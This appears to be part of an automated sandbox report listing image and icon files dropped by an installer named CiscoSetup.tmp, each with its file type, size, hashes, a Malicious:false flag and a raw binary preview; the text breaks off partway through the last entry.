                                                                                                                                                                                                  SHA-512:5DC60D3801387F534A126D0DE4336993954274BE9696A0D73CE3161C6B2D36B7DCFFC38AD714CCD0CFBDB397FECC9DF845AF4B65215249A7637321F38A5033D6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1 x 38, 8-bit colormap, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2213
                                                                                                                                                                                                  Entropy (8bit):4.905752993252195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:iY/6A64knA9WIiDYfv4c0POd9Od4LOR3POgHWv:iYSGknmWIiDYfQpOd9OdqOVOgHWv
                                                                                                                                                                                                  MD5:A3A99D7E09DE348A18379BA84F5FBD33
                                                                                                                                                                                                  SHA1:7E7BE73D74601EA7CCFE7389152D189DA10A275F
                                                                                                                                                                                                  SHA-256:A8F0C8E087C47D78EBC0D0D9FBE4BF124F9049BE49A4D7E919D80CEF3E294FD7
                                                                                                                                                                                                  SHA-512:414293559F4245B4065246C582D815582E4DFF1E0882CDC3B0439E66204916B9C372D5430C77C49444CB69F61C715337C67275773D76E36C377AB287FEAC2E8E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......&.....2b.5....PLTE...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................h....pHYs................ iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c140 79.160451, 20
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.612237043911612
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:SPEyydQzC5enoYfFMdIDhjdmrEEN4kbGg2o:SFS5eno4FMyADNHx
                                                                                                                                                                                                  MD5:CAE552335F760EE1FF87D686F972BEB8
                                                                                                                                                                                                  SHA1:676A5070DDD6218C274FE01608754D06E735558A
                                                                                                                                                                                                  SHA-256:615057C1B8C472DDF3D6B48284DB764F3F4FE8A159FD479B96C401D0BEE82674
                                                                                                                                                                                                  SHA-512:876B7077A8DF9C900BCF1CF8D5AF98A3B84A7D31412DEE05CAF76ACA215B771EFD5CD5E8225175E822BCE24239A57F841D1DDF633B3C68599D0C401AA98BBDF9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ..............................................................@...@...@...@...@...@...@...@...@...@...@...@...@...@...........................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@.....................................................................P.....@...s...s...s...s...s...s...s...s...s...s...s...s...@.........P.................................................................@...s...s...s...s...s...s...s...s...s...s...s...s...@......................................................................X5...@...s...s...s...s...s...s...s...s...s...s...s...s...@..X5...........................................................xh.M'..M'...@...s...s...s...s...s...s...s...s...s...s...s...s...@..M'..M'...xh..............................................xh.M'..M'.......@...s...s...s...s...s...s...s...s...s...s...s...s...@..z]J.M'..M'...xh................................P........M'..M'
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 38 x 30, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4370
                                                                                                                                                                                                  Entropy (8bit):7.900909498577029
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:TSDZ/I09Da01l+gmkyTt6Hk8nTcm/smdB4cT3NGDBWPryd:TSDS0tKg9E05Tcm/smAkMEPed
                                                                                                                                                                                                  MD5:CE71A3CEA2599D3A31ACAA9B55CA11E7
                                                                                                                                                                                                  SHA1:0592CF53E554F95BC722A21AF3CC9DF896BB6108
                                                                                                                                                                                                  SHA-256:0E0CF343355B77AA93DC0AFA9AFF96FF64EF5DFE73E9AAB57ECAA776BEC7EE7A
                                                                                                                                                                                                  SHA-512:D04AF6ED7247BCF61C969C1668A0F8F62CBA4A83E08CCFAE63755F56A4F6D49F9B1E39FABB10A3C04675828379658AE8FE414AC7682F7211C4A5F8949224E7EF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...&.........@.ln....pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2465
                                                                                                                                                                                                  Entropy (8bit):7.9078675566370515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:OSjMqJt67atsaB2Q95MFMQQYs/7uI2/D8:OSd+7OsTQTuQYszIb8
                                                                                                                                                                                                  MD5:161092451DAE50221183377F7CFB560E
                                                                                                                                                                                                  SHA1:2884EE1CAD503614512FAF274C3E0AC209F9201B
                                                                                                                                                                                                  SHA-256:8CB267EF7B475567CF0A347A4E99CC533102789A966B7285A7733FD8E4FBDE47
                                                                                                                                                                                                  SHA-512:0BD327894C7A1AFC5AF1B3CD1D678370C568DF1A06A32408B4A4A3047A846657EDC09A1A0E094565EF4004DF6FEE3FBF0A2885FE0279F4920CB91FBE1D897B14
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~....SIDATx..\.l.U...d..v..P(t[..DDJ....-..."...5....1T.Q"i..?.....jK..ZS....) .*..6........s...e.3o...........s..{.*r... ..2.(.o}|..."...6l..]n....y..t".ID.D...l..ql;vt.y...u\g..:..+{......I5DT..5.t...!....8)K.:RS..!..-...S.0....e[..*8Y...E)A......H...y.yL%*.uU..S].>AV.'.\%QJ..&..)z...s.U|.!...i..5....e. .?.S*#.t....#..m...ol.D.7..CM..B.WM%|.L...E.)..P..6...A.V.d. .?....T3oF.=...JJL.qI....C.{..v..W.}.PS..........#........n%=.`.]}.._H...S..l.eL.5.9..;...x.....!).....T...q.....<.VU...n..J....i....g.{.m2$.61.9.....I..&7k.*.|.'m5s.).]...7....`n$.$C.....X!)....a......9..q...0......$..9.....A......!m...:.{.....T..LZ.....&|.H...A.0..8.O....?".,..N.V..._6R...X`.w...gx.5U....I..OIV.J...z.i.H..k...\..U.. >}..A`yi...Ct.y..8..#@Q8.'&.KK.D0y...2..i..$....Q...."j.....[Fg..0....,(9o.".8]S.#.9"ZSY.....Dtu_..ZO...G.9f.".(.$M.t+...e9&...L..NDk....$......|.l~..O`.....G...'.,`.D3...*.\.g.VEqQ."..C..,.*9..M.y..~."..A.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 101 x 101, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1856
                                                                                                                                                                                                  Entropy (8bit):7.845521158056495
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:M5K2A2T3d0z5uOpdNSaQfbDS3YsPWaU3SjmUjm42rh:Mg2A9z5Fp1W3otPW5p
                                                                                                                                                                                                  MD5:AFAF04A11862845AFC31D64F7762D28E
                                                                                                                                                                                                  SHA1:C5E99C3DC321086738CB7BCF13EFF55EBDF1D3CF
                                                                                                                                                                                                  SHA-256:6797601AA69F2B489ADAB85A6DA73E78D4E041D24598BC726A3E837D2BE2D75E
                                                                                                                                                                                                  SHA-512:3D463D3EA19E87E8B592974BF4B69F4F6F5DE08975BB04AB0C180AE7CC49C9866E7B40F2D5890E50E7BF0FE2F8830125335FECB7C4FED8F2AF6045F8E66E18B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..r.F...I.t..X..*.&T..P.JT.*...d.)0..@.....I.T...~..L.9...".....s.7..{D..|..?w.D".H$..D"......$...h..{*...#..C..6dDt...0..]..6.v.<.,.....8E.k...$.h..j)..s...C.XE.r]5\..E|..].bDY.....Rl...\X..p]WMt.,..Q..O...Oe...........\..b...1.|BY.f.r.d.5.]..#e..h.u]5.y%...DtGD....q_Z.m.Vi.+*......5....{G.^~'..-.8..Xx...xK.-...[.a...2_wa...%....E..!...m1XKi.d...r...o.v.>.SIeq..)m....AH.....^.F.?.....w...?.s.G.......^r...G.(.viDh.X....O.>..+..5@....9....+..]W......m.emb!...../....W..WS?8d.E.<.Q...S...!.!#.R.u5........4..Qn.F*.G[.PYQY@...D........|..,.*.am....h..k..e"0'....IQJ..@N..7...&^.Y.S..........Q[o..../|j":.xnb._q...{^c'..Lz..!(.t..t..k.X...n..+................xLkzz....W..RVr.....Q.wy.T.........]... $n)d..#..........%..}.Hx..q..,T7..F..v....=7p..$(....].S.....D......=...m.B.......ML ..%...X...U.*...e..H..EM.?......].....D...o.).M...W.P.h......=..#..4...Z..0Yn.E..?...K ;K.$..n..Zq-A..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 534 x 534, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28939
                                                                                                                                                                                                  Entropy (8bit):7.960017526195935
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:OkJC2FKvbdu0G3091/3+WVlQkJyE3MNLc37Wr65:FCQmc0390W0kT8ll8
                                                                                                                                                                                                  MD5:B52EAA7318111371B2B8EF3425AD4405
                                                                                                                                                                                                  SHA1:DB16F9570B55F8045FE8354ACC853655791557AA
                                                                                                                                                                                                  SHA-256:C33C036B94E3BD83D393E552CE87784BA9F74D2B8563162024DAF7ED05E7EF6D
                                                                                                                                                                                                  SHA-512:AA98F3130A76BCD5FAF093886472F1A937E93AD0A8E83C00F9675C14C7AFC5DF903C52DE64FBAD6012F5DF54A1DB56759481BA8516C0DB0A851B6BE87FD13DFF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.............|@.E....pHYs...#...#.x.?v.. .IDATx..Mh]W.........CH..#...5.R.R..h$...'e.Cj.T.g....G...Z..v.aB..w..K.I..E.).....d..."]g...P.l.u..>{.?....@..u.>.......g=.....|.:D..~.........|(...q[.g.d.......~..9r.w...'...pnn.P..D$.xx(?..K"..r..9.I.....L.t.9.A\B.D.....^&...e.'.._Bk..M....$|....?....k=...:...N..N..{2*..a/~.UO..t*...'cuu....~.....zB*......IHS.T9!......|.. q.?}......].M,u.|i.90.<.s;y.Q.'..#..FH..3tP.:.i.]6...a.I0'.J...Rt2.!..I.c.}Q.'cyy.R.'uF...j..Sxy.u..}F..{D..H2G...1.`.R.......:..g.}D.Y....y..O=....7|`..].Eg..4.&.....[mzd.9.e......{.}.;.e'`u.sB..M...;#}.I.%R......Dd=.z..#.Q...;..j.E...;...o...b.D.p.v..I.L.\"i.\2.GD."G..ti....ui..W.........p.....sS+j...A..........]/F...ybst...4}!.....d.i.....,.M.Y..../.v.......Q...He....DM.;V.&:^......D.ka.l....^.....{...L......F........=...yB..U.#.QwD.<!....5.ZO...0yB^.........K#L...^.]....(.R.X.d.+.'y?..d."T:OH..s...J?{E|.....;....)....o.=.:+ZUp..H{{{......F.;[.8...H......
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4117
                                                                                                                                                                                                  Entropy (8bit):7.943813748161345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:79m160UrZetyDZrcRzRB+6nB49EkDPzkWb9PhkqjhqBx1DNo:79G6xr6yVrkzRB+UkEWb9pji1DNo
                                                                                                                                                                                                  MD5:04127248AAA5B7D32DC2DE4F02DA025F
                                                                                                                                                                                                  SHA1:6509E437F6503A9975953B955054D29ACE439D5F
                                                                                                                                                                                                  SHA-256:946B8C23BF05558B52D273502A65731A5E412C9E02A544748C5E5C27A3ED6D0D
                                                                                                                                                                                                  SHA-512:F26907895DAAEEE025FB20BCD22803F1151A5D5037B85FF1DCD71DA98E78C417996C08759F646D8E463FB6DD43A36F10092746D6520F9C70BE4AC03AF3B5F48A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Z.l..u~s........)..(.,KQd.Ih...D5.q..(..@."6..E[.P...r.F..5..H..@Z'h....(:...P4.S..]..=..{..R.D.....@.;...w|.{..............@.DW.8........`.@/.!.N....o..r..D.\..]..? .";U_U...R../q.b.e.e..%-S..J..._1.....0...P(.....!........U.......kg.6...-....^.m...8.....E..3E.r}...._..fg&..............f1.....B.u\.g....zz.w...NWoc.... ...m.....9Z.'.....l..a.L..?.KX?>?V.:84X.../..7...._....#..zT.~.{wu..B......VI.l...e..F^.l...Hy...1..4...[.p......S....j./.t.0..c..O..Z6wGiw'..h........8..`w.g.5.Q..&*.Gxd...@3,..z...8.T...,..VAP$(.tm... .. ......*....\.`.Q.hQ.I\v.].....N..............}...@...%...........x.x.DU.e$..*m.5%..(.A".X.d@r...d.l....:.B..Q..U.H.5....X...k.'...p.>.ZCWo..{...j.2...[....Fg...0.\T...4d.'....%H.....@.k-...4!.+..B..Obr.=948..BgK5?..;Sv`.....)\d........u..}.pw..G.s.TV..R.<.7S......0}.......h.9..*.NG... W4..<*.!..>.U....;c.>..Z.sR..<w......I.....G:.>..#"...%...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):472
                                                                                                                                                                                                  Entropy (8bit):7.339402871750466
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7IEzFffWxjBiqsoNKXcQjmUVQtaaHI:hI0RBiqJycQjmU6t9HI
                                                                                                                                                                                                  MD5:AE59E69F9BB8D40D28E2C195A5F131BD
                                                                                                                                                                                                  SHA1:1AC9ED0DD66CEFA5F515A8C0D51A3E26B7F2F6A9
                                                                                                                                                                                                  SHA-256:271F2C4002F0127CD049A9BEEED8474FACED3217E7BB0C6DDEB8B34F8536FA8E
                                                                                                                                                                                                  SHA-512:D69C0C2F7C190D1795A5C6455949C0B7F63D678785C170D8DB4A7D3FF88A048D954C8236E750D2F38CAD6CED9072DA7E8E3B5B384465074637D43390D9857C26
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...Q.@...:..;......C.2)@,..:.*........(.9.........0....v.~.?.....j.....g.>n...z...u..NLU...;..2.s`.|.$...4],....Y............H.......G~.`$.p..^!]dS.UT.jE.%.......T...Y..O.....S...(.O.\.}..E{..2.p...s.._..,.D.wP.....DK.v...el..|..w.~.....{`))v.. .6^..y..rm:R}.L...+..<."..r...y#D9rD.Sd.Y..D_.o~......\.....$&;.1.6.<%..*.v.-.v3.^-M$ejU.4?%.K4..Y.R..Sm..'.AW..E....>".....^=.Y.......j.d.h.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):543
                                                                                                                                                                                                  Entropy (8bit):7.547901309478316
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:6v/7CWdT8JNBxFtHpTJKAghnooED91TFxff+Tye5N3Q2+ah7:KT8rBztJYnCjT3+TN5N1B7
                                                                                                                                                                                                  MD5:5D99349B36EE267BD85E3A4E4C8B9D09
                                                                                                                                                                                                  SHA1:AF5F88451BA51F5FBAE5D3D603655138EE78D27F
                                                                                                                                                                                                  SHA-256:84EF9A5D991E3B3E68AD6F7B8F2D9F279769DC9D27BBB205C3AB9B2BC1607ACA
                                                                                                                                                                                                  SHA-512:58C4E4CDD9B7D5C660A40467F504137D1779222AF24DAFFABB495DBD476A65940E93EF7E8EE7F9BF69A4C4F560D6BA5FB4EEC4DE81C77E4383A24D7B0110DA85
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~.....IDATH...R.1....y...U....kx..p.9..>@....' (d..=\..p..$....z...;s.In.}../..m.+..4..7.~...@e]...Wx.....~G.2.x+.6J.<&^..).Y.S....Tv.<....,.+..`....G>..Q!".5.h.l.}.I<...*S....t..>%r.0w{.1.mE .@.K.6.-........./L'S.7.|.j..]Z.w..<.'.Kk...`..0N..L..7_.(...C........8,.9. \.T.......K...\..0..L....:...!..}.$.(QQ.....T...../.)dzT..5..iu.......N./.....r.>}.&h%...x....o..6W...B.(...z.a...0w.....BYf.%.{.$.y.NUt*.@....F.T....ge.:v.m..t..xp....d......o.>.....0....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 200 x 201, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):13633
                                                                                                                                                                                                  Entropy (8bit):7.975971786407776
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:6MOtUX/uOlpyiGD809Mt039VytL65doCQc:1NWFl809Mt0j0Lap
                                                                                                                                                                                                  MD5:9C88E64458F50120E89167040B55A41C
                                                                                                                                                                                                  SHA1:8A43DFC4B9ED2CB460A024562405302468185A09
                                                                                                                                                                                                  SHA-256:E1E3C1C59B21F0F49EC9DB747C14760EC2068394F739A2E456F20A25E40AD24D
                                                                                                                                                                                                  SHA-512:7EACCCFC904D52AA13214757309858F4083F5CD8C06D6442F3C3F361A2AD01865C4A816240F3B87B63052F33AB96EB08F0C504A1CF0110C569D64350948B3BD8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............M.....pHYs...#...#.x.?v.. .IDATx..}.t....*...KT .J.(..U".T.`.*.+.U.D...`.....G....V[.&.....m.*JX7...A.>..G....^4....8..g....=..I.[...9gf.|...c......+\.>..8^E.M=..O....w|.U......'..5G.A...].......h.......7'.....3=9.Uk.Hi..9Q.9o.E.^..F.^.......+I.......8W.E....w..~...&..?.............7..-..FAO.S.......>.A..:.....d.Z.(.=.{Qy!.Fz....q.N.p..+.....\DFp.c...x.y.....u.7.&................kg..{.g.../...EL .......E..-...#.#.....f$g.v"........Igup..E.,b:f..Lv..#/&..oM.l..G..z^Q.<...f.^]{.[.g...q.X...._.....s.d..(0"..<...V.8q....CM..N....yb...{.i....d....Q....c...{.z...x..D.Mi....<'...#c....G..F.......CM).9.*'...n...Y...zz..q..l.;.j.w...!.F..'&........!z\s._.j..u.Q...].k+...(...R'.H..B....(x.R'.H...-.N.8....|_...!.Ks.>9.yf.^@..P.O..../..^..#.j/.......w....c?op.C2q..:...$#=A.n]..i..y.'....tR.D...5...T.DO.#..U...}"|\..S.qH... .H[..<..]..V...u(.0O:2.X. .....>.S\.?.$...Ez.....$..<.. .=..paR.|...8..T....]......./...IY.......O
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12068
                                                                                                                                                                                                  Entropy (8bit):7.961027992023309
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:ukEiqZZQXKSmwL4v9UIqsQ8Dfn0Mv2RYkTONqT0oHrkbthyZpLpXrCAfrdag8csp:uViqZZQXKSmwL4VXJhsYOTynyZpNmAjE
                                                                                                                                                                                                  MD5:7E7FE0627B08E07FEE4ED11C41A9BA59
                                                                                                                                                                                                  SHA1:E3C6036975AD146D70AE76158EEBD3D8109B0C7F
                                                                                                                                                                                                  SHA-256:019183BF0C9A25E37A7EB74ABB3DC7848C1A729BBDA1F557E26A5322DBAF11E2
                                                                                                                                                                                                  SHA-512:30E68B932388A840F92D45AA97C3B9CC012C28F36DE93D315B107C7223DCBFBF94A54A09492E930642555828FCB3F6CA519F75BE6EA451DFF7B1D2F5B8FA2472
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx...l....q.a_...n`.p.l..].!.X.cmb.T{W/8.6..6......%".T..yO)"...e!..5....[.+.;..y....RX..s..@[.&.6..j...1..sf..93..I.....;.......(F...-5>P....(.`..T|..P...}.D.H....R.L..8.....1...$.....A.X?.sb..;@...h9.wJ.;._.)eM........Ss...........4..o.............P[j.E.~.TE..0.......ro../.PA..SjK..8A.Zs..eE..X.!...<Y..Z.rr\J.}w.....?e......`..X.c. %......p.z4M7.PC........&.6.......".1c..>...^.d..S.9../s..O... ..4.j.]S<.>u..v.d6..1..S.@.N.y..=...;...9v..=...wB..Y...%.D..$..b...6u....wM...#......w..-.g...F!...he.O..r.2.....Qj..{D.\.we}.....D. ...(...$Z...?.U......r3k.o.'R.M........s....W..h.Hm.q).U.Z...}w....;...'v..I...QO.....Q1k:.h%...Ws...UA....!7....w.f].G..X...w..^...VBT$..pQ.,`-Ms.0.H.C.......d .2....\."...."G.=...{:Xgw..Rj...&.(.e..-C..+.(.)......a...n...'.I..@...8b.'.v."..r.BF./.....`...1.$Z.T$.WE.Y5sWes.:......}:./.y.DK..R.j.B.....YQ..X d|a.^.......F.D+.|..(.....KZ....(.,8~...,".y.H=.! ....
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                                                                                  MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                                                                                  SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                                                                                  SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                                                                                  SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:Targa image data - Map 32 x 2841 x 1 +1
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):431993
                                                                                                                                                                                                  Entropy (8bit):4.565786626694248
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3072:qG481XVja/lkbbVYHd6saT3N2z00cAXoKM0Baf0I:qC3a/lkbbaHd6saT3QZnXdBZI
                                                                                                                                                                                                  MD5:A6441E0D126BDAEB1308C9B4EB5D30D7
                                                                                                                                                                                                  SHA1:07206E99763B97507D5D7BCB3DF221F48ABF60FF
                                                                                                                                                                                                  SHA-256:5A624CBE0242B49FE13104345760BD16F6B2D50F1AC9FB19B92F76BDBBED938A
                                                                                                                                                                                                  SHA-512:DC85660518234A581F3EA19FB5892F53B1BA3671293F5BB886AD63D91CCEA0AC31E55ECEA528487AF1BC343CF226E268CF50B4903D67430919FD9B715889EB7B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:............ ............... ............... .^N............ .(R............ .(...!S..``.... .....I[..@@.... .(B......00.... ..%...2..((.... .h....W.. .... .....)r........ .............. .....Y......... .h........PNG........IHDR.....................pHYs..........o.d.. .IDATx...wtUU....MO..B....TA.. ...l....Ti"H.E...D@lT.EA.).... ........R...{o...Jd..o.L...},.RJ9.1.......#W..` (.#.._.....?>|..ki@j.G..........q..........2>....( ......RJ)u.,..J).2..a@^ <....C..?;..}9..f..p....|..#,.J...Rn.]..(.T.3.x....@..|.D..vu.N....W.|D.....y..(..5.c, ..^..!}.....Np...eY)B.R...PJy<cL(P9."._.............^...W....RJ)G..@).1.1.@9...U2>*..UGy.(2......,..M..R6..@).1..r._....dH.S.WC.Ws.eYi...R*+h...ri..?.j.........[..vsyc.eY...R..i...r).....wd|.B..+.....M.F`.eY.e#)....@).h.R..._..=...K9.q....>v..".....Q..cdl.....w.~Q.R.$.......t.R.I..PJ...<.C.}..&....M...h..(.l.1.....J..!...2>.Y.uA8.R...^.T.2...........H).I...V..,..!.G)...PJe..}....S.....r9'.....e....r3..(.n.1.8......M
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 201 x 200, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10811
                                                                                                                                                                                                  Entropy (8bit):7.9725003667897125
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:xGW6GZ0zrJJ+M0jTsGzV2jysFfqybOB4twma2iNrHbC4ussE84u:xMZUTsGirFioOBg49VvusV84u
                                                                                                                                                                                                  MD5:A805DED6582E8382AB22EAF761559ED7
